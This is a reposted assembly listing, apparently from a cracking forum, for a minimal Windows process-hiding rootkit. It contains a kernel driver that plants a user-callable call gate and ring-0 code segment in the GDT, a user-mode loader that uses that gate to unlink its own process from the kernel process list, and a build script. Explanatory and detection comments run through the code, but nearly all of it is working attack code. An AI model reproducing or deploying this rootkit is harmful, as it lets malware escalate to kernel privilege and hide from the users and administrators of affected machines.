Smallest hideproc

来源(白菜乐园)

From: http://www.crackbest.org/read.php?tid=16

Hide.sys:=========================================
.386
.model flat, stdcall
option casemap:none
include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc

.code
;-----------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pusRegistryPath)
; Kernel-mode half of the listing. Neither argument is used and no device
; object or dispatch routine is set up; the routine's only lasting effect
; is a write into the processor's GDT, after which it returns a failure
; status so the load is reported as failed (the GDT changes are not undone).
; Residual artefacts an integrity checker can look for (all visible below):
;   * byte 0 of the GDT (inside the null descriptor) patched to C3h (RET),
;   * a present, DPL 3, 32-bit call gate at selector 350h whose target
;     offset is the GDT base itself, i.e. that RET byte,
;   * a flat ring-0 code segment descriptor installed at selector 358h.
; Registers: all restored by pushad/popad, pushfd/popfd; eax = status.
;-----------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    pushfd
    pushad
    ; sgdt stores a 6-byte pseudo-descriptor: 16-bit limit at [esp-2] and
    ; the 32-bit base at [esp]. Storing at esp-2 makes the base land in the
    ; slot that was just pushed, so the pop below yields edx = GDT base.
    push edx
    sgdt [esp-2]
    pop edx
    mov eax,edx                 ; eax = GDT base (becomes the gate's target offset)
    mov ecx,350h                ; ecx = byte offset of the descriptor slot used (selector 350h)
    ; Bytes 2..5 of a call-gate descriptor are: selector (2 bytes),
    ; parameter count, access byte. 0EC000358h decodes to selector 358h,
    ; 0 params, access byte ECh = present, DPL 3, 32-bit call gate.
    ; If exactly that dword is already present, installation is skipped.
    .if dword ptr [edx+ecx+2]!=0ec000358h
        mov byte ptr [edx],0c3h             ; RET (C3h) written into the first byte of the null descriptor
        mov word ptr [edx+ecx],ax           ; gate offset bits 15..0  = GDT base
        shr eax,16
        mov word ptr [edx+ecx+6],ax         ; gate offset bits 31..16 = GDT base -> gate lands on that RET
        mov dword ptr [edx+ecx+2],0ec000358h ; selector 358h / 0 params / access byte ECh
        ; Descriptor at 358h: limit FFFFh, base 0, access 9Ah (present, DPL 0,
        ; code exec/read), flags CFh (4K granularity, 32-bit): flat ring-0 code segment
        mov dword ptr [edx+ecx+8],0000ffffh
        mov dword ptr [edx+ecx+12],00cf9a00h
    .endif
    popad
    popfd
    ; Deliberate failure status: the load is reported as failed while the
    ; GDT modification above stays in place. A service that "fails" with
    ; this status yet leaves a DPL-3 call gate behind is the pattern to
    ; correlate on the defensive side.
    mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
    ret
DriverEntry endp
end DriverEntry


Test.exe==========================================
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\macros\macros.asm
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib

; CTEXT text - places a NUL-terminated string in .data and expands to its
; ADDR, so it can be used inline as an invoke argument. Not referenced in
; this listing; the calls below use CTXT from macros.asm instead.
CTEXT MACRO text:VARARG
local TxtName
.data
TxtName BYTE text,0
.code
EXITM <ADDR TxtName>
ENDM

.data
; Far-pointer operand for `call fword ptr [Callgt]` in HideProc:
; a 32-bit offset (0 - a call gate ignores the caller's offset and
; supplies its own) followed by the 16-bit selector 353h = GDT index 350h
; with RPL 3, i.e. the gate slot written by Hide.sys above.
Callgt dd 0
dw 353h

.code
start:
; Program entry. HideProc is never called: execution falls through this
; label into the proc's prologue (which sets up the locals below), and the
; process ends via ExitProcess, so the frame is never torn down.

;Hidden Current Process
;-----------------------------------------------------------------------
; HideProc - user-mode half of the listing.
;  1. installs Hide.sys (above) as a temporary kernel service, starts it,
;     and deletes the service again;
;  2. far-calls through the call gate the driver left at selector 350h
;     and, now running at ring 0, unlinks the current process from a
;     kernel doubly-linked list (a DKOM unlink);
;  3. returns to ring 3 and busy-waits for F12 before exiting.
; The kernel addresses/offsets used (0FFDFF124h, 44h, 88h) are hard-coded,
; are not derived from anything in this listing, and are not validated;
; they appear to be tied to one 32-bit kernel layout.
; Detection notes: an unlinked process remains reachable through other
; views (handle tables, thread lists, scheduler data), so cross-view
; process enumeration still finds it; the DPL-3 call gate at selector
; 350h and the patched first GDT byte are the residual artefacts.
;-----------------------------------------------------------------------
HideProc proc
    local hSCManager:HANDLE
    local hService:HANDLE
    local acDriverPath[MAX_PATH]:CHAR
    invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
    .if eax != NULL
        mov hSCManager, eax
        ; The pushed eax slot doubles as GetFullPathName's lpFilePart output
        ; (esp is passed as that pointer) and is popped again afterwards.
        push eax
        invoke GetFullPathName, CTXT("Hide.sys",0), sizeof acDriverPath, addr acDriverPath, esp
        pop eax
        invoke CreateService, hSCManager, CTXT("Hidden",0), CTXT("System",0), \
        SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \
        SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL
        .if eax != NULL
            mov hService, eax
            ; StartService's result is not checked (DriverEntry returns an
            ; error status by design); the service is deleted straight away.
            invoke StartService, hService, 0, NULL
            invoke DeleteService, hService
            invoke CloseServiceHandle, hService
            invoke CloseServiceHandle, hSCManager   ; hSCManager is only closed on this path
        .endif
    .endif
    ; Far call through selector 353h (index 350h, RPL 3), reached regardless
    ; of whether the service above was created. The gate target is the RET
    ; byte the driver wrote at the GDT base, so control returns to the next
    ; instruction - but at CPL 0 and still on the kernel stack. If no gate
    ; is installed this presumably faults instead.
    call fword ptr [Callgt]
    ; After that RET the kernel stack holds [esp]=CS, [esp+4]=ring-3 ESP,
    ; [esp+8]=ring-3 SS. Keep the kernel ESP in eax and switch back to the
    ; user stack for the work below.
    mov eax,esp
    mov esp,[esp+4]
    push eax
    pushfd
    pushad
    ; Hard-coded kernel layout (not established by this listing; looks like
    ; a 32-bit XP-era KPCR/KTHREAD/EPROCESS layout - confirm per build):
    ;   [0FFDFF124h]  -> current thread object
    ;   [thread+44h]  -> owning process object
    ;   process+88h   -> a LIST_ENTRY {Flink, Blink} (presumably ActiveProcessLinks)
    mov eax,dword ptr ds:[0ffdff124h]
    mov eax,[eax+44h]
    mov ecx,088h
    mov esi,dword ptr[eax+ecx]          ; esi = Flink
    mov edi,dword ptr[eax+ecx+4]        ; edi = Blink
    mov dword ptr[esi+4],edi            ; Flink->Blink = Blink
    mov dword ptr[edi],esi              ; Blink->Flink = Flink (this entry is now unlinked)
    popad
    popfd
    pop esp                             ; back on the kernel stack; CS, ESP, SS are still there
    ; Far return frame: EIP = Exit, then the CS/ESP/SS left by the gate call.
    ; A retf to a lower privilege level pops all four, resuming at Exit in ring 3.
    push offset Exit
    retf
Exit:
; Busy-poll until F12 is pressed, then exit.
KillProc:
    Invoke GetAsyncKeyState, VK_F12
    test eax,eax
    jz KillProc
    invoke ExitProcess,0
HideProc endp

end start



Maker.bat:========================================
@echo off
rem Build script for the two listings above; the input/output file names
rem used here differ from the Hide.sys / Test.exe headings of the listing.
cls
echo :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::
rem Driver: assemble to COFF and link as a native-subsystem driver image.
C:\masm32\bin\ml /nologo /c /coff Hidden.asm
C:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:Hidden.sys /subsystem:native Hidden.obj
echo :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::
rem User-mode program: assemble and link as a Windows-subsystem executable.
C:\masm32\bin\ml /c /coff Proce.asm
C:\masm32\bin\link /subsystem:windows /out:Proce.exe Proce.obj
echo :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::
rem Remove intermediate objects; ml/link exit codes are not checked.
del *.obj
pause


Link: http://www.asm32.net/article_details.aspx?id=5235

